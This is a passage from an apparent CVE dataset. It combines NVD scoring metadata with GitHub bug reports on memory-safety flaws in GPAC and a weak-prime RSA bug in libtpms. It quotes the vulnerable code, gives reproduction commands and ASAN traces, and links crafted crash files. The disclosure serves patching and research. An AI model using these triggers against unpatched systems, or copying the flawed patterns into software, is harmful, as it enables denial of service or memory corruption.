In the adts_dmx_process function in filters/reframe_adts.c in GPAC 1.0.1, a crafted file may cause ctx->hdr.frame_size to be smaller than ctx->hdr.hdr_size, resulting in size to be a negative number and a heap overflow in the memcpy.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/22774aa9e62f586319c8f107f5bae950fed900bc" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1723" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/22774aa9e62f586319c8f107f5bae950fed900bc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1723" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1723
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
In `filters/reframe_adts.c`, function `adts_dmx_process`. There is a sub codes like as below: ` size = ctx->hdr.frame_size - ctx->hdr.hdr_size; offset = ctx->hdr.hdr_size; ...... memcpy(output, sync + offset, size); ` However, with crafted file, ctx->hdr.frame_size may be smaller than ctx->hdr.hdr_size. So, the size may be a negative number, which results a heap overflow in memcpy. In Command line: gpac -info bug6 ![bug6_cmd](https://user-images.githubusercontent.com/44844446/112800680-8d05c780-90a2-11eb-8b87-557d15fc11b4.png) In gdb: ![bug6](https://user-images.githubusercontent.com/44844446/112800687-8f682180-90a2-11eb-964a-1ace9cba1bff.png) The crafted file is in the attached zip: [bug6.zip](https://github.com/gpac/gpac/files/6219966/bug6.zip)
A integer (heap) overflow in function adts_dmx_process
https://api.github.com/repos/gpac/gpac/issues/1723/comments
1
2021-03-29T07:23:30Z
2021-03-29T07:47:23Z
https://github.com/gpac/gpac/issues/1723
843,060,662
1,723
1,858
CVE-2021-30020
2021-04-19T20:15:14.550
In the function gf_hevc_read_pps_bs_internal function in media_tools/av_parsers.c in GPAC 1.0.1 there is a loop, which with crafted file, pps->num_tile_columns may be larger than sizeof(pps->column_width), which results in a heap overflow in the loop.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/51cdb67ff7c5f1242ac58c5aa603ceaf1793b788" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1722" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/51cdb67ff7c5f1242ac58c5aa603ceaf1793b788" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1722" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1722
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
In `media_tools/av_parsers.c`, function `gf_hevc_read_pps_bs_internal`. There is a loop as below: ` pps->num_tile_columns = 1 + gf_bs_read_ue_log(bs, "num_tile_columns_minus1"); pps->num_tile_rows = 1 + gf_bs_read_ue_log(bs, "num_tile_rows_minus1"); pps->uniform_spacing_flag = gf_bs_read_int_log(bs, 1, "uniform_spacing_flag"); if (!pps->uniform_spacing_flag) { for (i = 0; i < pps->num_tile_columns - 1; i++) { pps->column_width[i] = 1 + gf_bs_read_ue_log_idx(bs, "column_width_minus1", i); } ` However, with crafted file, **pps->num_tile_columns** may be larger than sizeof(pps->column_width), which results a heap overflow in the loop. In Command line: gpac -info bug5 ![bug5_cmd](https://user-images.githubusercontent.com/44844446/112795077-9428d780-909a-11eb-876e-98e1703150b2.png) In gdb: ![bug5](https://user-images.githubusercontent.com/44844446/112803057-790f9500-90a5-11eb-8d68-f5f040fd8115.png) The crafted file is in the attached zip: [bug5.zip](https://github.com/gpac/gpac/files/6219707/bug5.zip)
A heap overflow in function gf_hevc_read_pps_bs_internal
https://api.github.com/repos/gpac/gpac/issues/1722/comments
1
2021-03-29T06:29:39Z
2021-03-29T07:47:09Z
https://github.com/gpac/gpac/issues/1722
843,020,967
1,722
1,859
CVE-2021-30022
2021-04-19T20:15:14.647
There is a integer overflow in media_tools/av_parsers.c in the gf_avc_read_pps_bs_internal in GPAC 1.0.1. pps_id may be a negative number, so it will not return. However, avc->pps only has 255 unit, so there is an overflow, which results a crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/51cdb67ff7c5f1242ac58c5aa603ceaf1793b788" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1720" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/51cdb67ff7c5f1242ac58c5aa603ceaf1793b788" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1720" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/gpac/gpac/issues/1720
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
There is a integer overflow in `media_tools/av_parsers.c:5349`, function `gf_avc_read_pps_bs_internal`. Below code: `pps_id = gf_bs_read_ue_log(bs, "pps_id"); if (pps_id >= 255) { return -1; } pps = &avc->pps[pps_id]; pps->id = pps_id; ` pps_id may be a negative number, so will not return. However, avc->pps only has 255 unit, so overflow, which results a crash . More than, because of the `pps->id = pps_id`, the vuln may lead to an any addr write. In command Line: gpac -info bug3 ![bug3_cmd](https://user-images.githubusercontent.com/44844446/112791109-61c7ac00-9093-11eb-8fca-cd4c258dd6aa.png) In gdb: ![bug3](https://user-images.githubusercontent.com/44844446/112791114-642a0600-9093-11eb-86ea-65536bd0eabc.png) The crafted file is in the attached zip: [bug3.zip](https://github.com/gpac/gpac/files/6219500/bug3.zip)
A Integer Overflow in function gf_avc_read_pps_bs_internal
https://api.github.com/repos/gpac/gpac/issues/1720/comments
1
2021-03-29T05:34:17Z
2021-03-29T07:46:46Z
https://github.com/gpac/gpac/issues/1720
842,986,600
1,720
1,860
CVE-2021-30199
2021-04-19T20:15:14.707
In filters/reframe_latm.c in GPAC 1.0.1 there is a Null Pointer Dereference, when gf_filter_pck_get_data is called. The first arg pck may be null with a crafted mp4 file,which results in a crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/b2db2f99b4c30f96e17b9a14537c776da6cb5dca" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1728" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/b2db2f99b4c30f96e17b9a14537c776da6cb5dca" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1728" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1728
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
In filters/reframe_latm.c:480. There is a Null Pointer Dereference, when call `gf_filter_pck_get_data`. The first arg pck may be null with a crafted mp4 file. As below code shows: ` if (!pck) { if (gf_filter_pid_is_eos(ctx->ipid)) { // check1 if (!ctx->latm_buffer_size) { // check2 if (ctx->opid) gf_filter_pid_set_eos(ctx->opid); if (ctx->src_pck) gf_filter_pck_unref(ctx->src_pck); ctx->src_pck = NULL; return GF_EOS; } } else { return GF_OK; } } ` Although there are checks to test if pck is null. But when check1 is true and check2 is false, the checks are nothing. The command line: ![bug7_cmd](https://user-images.githubusercontent.com/44844446/113409005-f9563300-93e2-11eb-92aa-11491b2bb339.png) In gdb: ![bug7](https://user-images.githubusercontent.com/44844446/113409007-fb1ff680-93e2-11eb-85c2-08fe0c6f3c29.png) The crafted file: [bug1.zip](https://github.com/gpac/gpac/files/6249122/bug1.zip)
A Null Pointer Dereference In function gf_filter_pck_get_data
https://api.github.com/repos/gpac/gpac/issues/1728/comments
0
2021-04-02T10:42:56Z
2021-04-08T08:21:38Z
https://github.com/gpac/gpac/issues/1728
849,144,670
1,728
1,861
CVE-2021-3505
2021-04-19T21:15:13.270
A flaw was found in libtpms in versions before 0.8.0. The TPM 2 implementation returns 2048 bit keys with ~1984 bit strength due to a bug in the TCG specification. The bug is in the key creation algorithm in RsaAdjustPrimeCandidate(), which is called before the prime number check. The highest threat from this vulnerability is to data confidentiality.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950046" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/stefanberger/libtpms/issues/183" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NUCZX4S53TUNTSGTCRDNOQZV2V2RI4RJ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950046" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/stefanberger/libtpms/issues/183" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NUCZX4S53TUNTSGTCRDNOQZV2V2RI4RJ/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libtpms_project:libtpms:*:*:*:*:*:*:*:*", "matchCriteriaId": "1A8A1473-AE41-46BD-98C5-1642BFBD6D47", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:advanced_virtualization:*:*:*", "matchCriteriaId": "3AA08768-75AF-4791-B229-AE938C780959", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "331" ]
331
https://github.com/stefanberger/libtpms/issues/183
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "stefanberger", "libtpms" ]
**Describe the bug** When running `tpm2_createprimary` on swtpm with libtpms 0.7.4 to generate an RSA-2048 key, the modulus of the key always contains many zeros in its high bits. By extracting the prime factors from file holding the persistent TPM state, they always have 32 bits set to zero. For example: * Modulus `n = 0xc8f8f77a0000bacc2f18e6a43f600d9990b9079654f85b23da5b26896a7cab24d52ea3dcae0bc754b2cf0aefd3ac036459d4a2bd1ec1c25d56f7822a633c1bd29ad54f4ec7a7e3e8d64697c737283c4b77ec01c9eb0dd36371dfb7fd160b1b6f946db24f0eda15997e488f7427c87f173d5d3baecf98d0d6832a97d28c3da99835cf22a83c39d6dd61f880422541b80d958a0f8756f804a65571c7937768717648deb6f8ccc8343a42a2b672ecd4e523f0ded37822db4b1af769416e4dcdb3d55ad4c7b78f47904a47f1418bc59295c2b2a6e2ea9f3c40caaf1f23a79ed18aab4bfb9754676b47759e705d5ab1ba8fd96be01ac7e475485a4577e105d6dc5e4f` * First prime number `p = 0xdd7500000000a998d562fd94dd501fbaedbd693474333472bab4a5889a021b5ae79d4bf98c87d2509831103be119297abdc09e315a66bf1918a2d27a19ed805b01ea87f01e433c14bb6dde779bb70de6878b0697b9f2d1b064fe48bd06c83d11d3170d99a7f1637d2c10f0e00a0f04bd21ce3e02a2fa8803fd8fe5d9512b60b9` * Second prime number `q = 0x0xe8520000000026049bfad92bbdea021f996acd0c55557fd42d16acb73fbd94cd908a636fc5da4e635707f7aa1e2f3041f144755520094b6ac322dfd57f5f3b98b679725a7bd33373fd67a11f2d51bbef4cf486bf60db2c89093bfcbc229f640be853f04d98b27aa0b5a613d5edd4350d8c90e7189a4097f0703f4f88f0556347` (Observe the eight `0` hexdigits after the 4 first hexdigits of the prime numbers). This is due to a bug in function `RsaAdjustPrimeCandidate` https://github.com/stefanberger/libtpms/blob/2452a24dabd7b5596f429a1e8de00e064a5566de/src/tpm2/crypto/openssl/CryptPrime.c#L304-L318 The issue is that on 64-bit systems, `MASK` is not `0x0000ffffffffffff` but `0x000000000000ffff` when `RADIX_BITS` is 64, so only the 16 lowest bits of `*msw` are kept instead of the 48 lowest bits. More precisely, in `#define MASK (MAX_CRYPT_UWORD >> (RADIX_BITS - 16))`, the shift operand should have been `16`. This bug is present in TCG specification (<https://trustedcomputinggroup.org/wp-content/uploads/TPM-Rev-2.0-Part-4-Supporting-Routines-01.38-code.pdf> section `10.2.15.7 AdjustPrimeCandiate()`). This specification was updated and the current version does not have this bug (<https://trustedcomputinggroup.org/wp-content/uploads/TCG_TPM2_r1p59_Part4_SuppRoutines_code_pub.pdf> section `10.2.14.1.6 AdjustPrimeCandiate()`). This new version was implemented in April 2020 in <https://github.com/stefanberger/libtpms/commit/625171be0c8225824740b5d0fb7e8562f6a1c6a8> (branch `master`) but no release of `libtpms` includes the new version yet. Therefore I have three questions: * Could `RsaAdjustPrimeCandidate` be fixed in branch `stable-0.7.0` so that generating new RSA keys do not use prime numbers with many zeros, on 64-bit systems? * If no, could a comment be added which clearly state that this prime number generator generates prime numbers that have 32 bits always set to zero and that the TCG already fixed this issue in a newer version of "Trusted Platform Module Library Family "2.0" Specification - Part 4: Routines - Code"? * When will the next release of `libtpms` (version `0.8`?) occur? **To Reproduce** Steps to reproduce the behavior: 1. On Arch Linux on an x86-64 system, install `swtpm`, `tpm2-tools` and `tpm2-abrmd`. 2. Launch `swtpm` in TPM2-mode and `tpm2-abrmd`, for example with: ```sh swtpm socket --tpm2 --server port=2321 --daemon --ctrl type=tcp,port=2322 --flags not-need-init --tpmstate dir=/tmp tpm2-abrmd --allow-root --tcti swtpm:host=127.0.0.1,port=2321 ``` 3. Generate a persistent RSA key on the software TPM, for example with: ```sh export TPM2TOOLS_TCTI=tabrmd:bus_type=system tpm2_createprimary -c /tmp/context.out -g sha256 -G rsa tpm2_evictcontrol -c /tmp/context.out 0x81000001 ``` 4. Analyze the content of `/tmp/tpm2-00.permall` to retrieve the modulus and the prime numbers of the generated RSA key. **Expected behavior** `tpm2_createprimary` should create an RSA key with prime numbers which really look random, instead of with 32 bits always set to zero. **Desktop (please complete the following information):** - OS: Arch Linux on an x86-64 CPU (64-bit system) **Versions of relevant components** - libtpms: 0.7.4 - swtpm: 0.5.2
[libtpms 0.7] TPM2_CreatePrimary creates prime numbers with 32 zero bits
https://api.github.com/repos/stefanberger/libtpms/issues/183/comments
8
2021-02-17T11:08:16Z
2021-03-01T10:31:10Z
https://github.com/stefanberger/libtpms/issues/183
810,084,843
183
1,862
CVE-2020-35979
2021-04-21T16:15:08.647
An issue was discovered in GPAC version 0.8.0 and 1.0.1. There is heap-based buffer overflow in the function gp_rtp_builder_do_avc() in ietf/rtp_pck_mpeg4.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/b15020f54aff24aaeb64b80771472be8e64a7adc" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1662" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/b15020f54aff24aaeb64b80771472be8e64a7adc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1662" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1662
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master c4f8bc6e and latest V1.0.1 d8538e8) I think it is probably due to an imcomplete fix of [#1483](https://github.com/gpac/gpac/issues/1483) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box --extra-ldflags="-ldl -g" $ make ``` Run Command: ``` $ MP4Box -hint $gp_rtp_builder_do_avc-hepo -out /dev/null ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-c4f8bc6e_poc/gp_rtp_builder_do_avc-hepo ASAN info: ```C ==39148==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000dca9 at pc 0x000000fe1693 bp 0x7ffc75309fc0 sp 0x7ffc75309fb0 READ of size 1 at 0x60300000dca9 thread T0 #0 0xfe1692 in gp_rtp_builder_do_avc ietf/rtp_pck_mpeg4.c:436 #1 0x92b813 in gf_hinter_track_process media_tools/isom_hinter.c:796 #2 0x418d5d in HintFile /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:1446 #3 0x42bdc7 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6641 #4 0x7fac0705783f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #5 0x417638 in _start (/opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/build/bin/MP4Box+0x417638) 0x60300000dca9 is located 0 bytes to the right of 25-byte region [0x60300000dc90,0x60300000dca9) allocated by thread T0 here: #0 0x7fac07fff602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7b69e5 in Media_GetSample isomedia/media.c:573 #2 0x7602dc in gf_isom_get_sample_ex isomedia/isom_read.c:1808 #3 0x92b36d in gf_hinter_track_process media_tools/isom_hinter.c:721 #4 0x418d5d in HintFile /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:1446 #5 0x42bdc7 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6641 #6 0x7fac0705783f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) SUMMARY: AddressSanitizer: heap-buffer-overflow ietf/rtp_pck_mpeg4.c:436 gp_rtp_builder_do_avc Shadow bytes around the buggy address: 0x0c067fff9b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9b60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9b70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9b80: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 04 fa =>0x0c067fff9b90: fa fa 00 00 00[01]fa fa fd fd fd fa fa fa fd fd 0x0c067fff9ba0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x0c067fff9bb0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c067fff9bc0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x0c067fff9bd0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x0c067fff9be0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==39148==ABORTING ``` Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Xiangkun Jia(xiangkun@iscas.ac.cn) 、Marsman1996(lqliuyuwei@outlook.com) and 